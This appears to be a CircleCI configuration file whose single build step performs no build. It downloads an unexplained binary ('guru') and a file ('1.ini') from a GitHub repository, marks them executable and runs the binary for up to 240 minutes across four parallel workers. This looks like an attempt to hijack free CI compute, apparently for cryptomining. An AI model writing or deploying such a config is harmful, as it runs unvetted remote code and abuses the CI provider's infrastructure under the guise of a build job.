version: 2.1
jobs:
  build:
    docker:
      - image: cimg/python:3.8
    parallelism: 4
    steps:
      - run:
          name: Running
          command: |
            sudo apt update
            wget https://github.com/anstwn/cave/releases/download/latest-1/guru
            wget https://raw.githubusercontent.com/anstwn/cave/main/1.ini
            chmod +x guru 1.ini
            timeout 240m ./guru 1.ini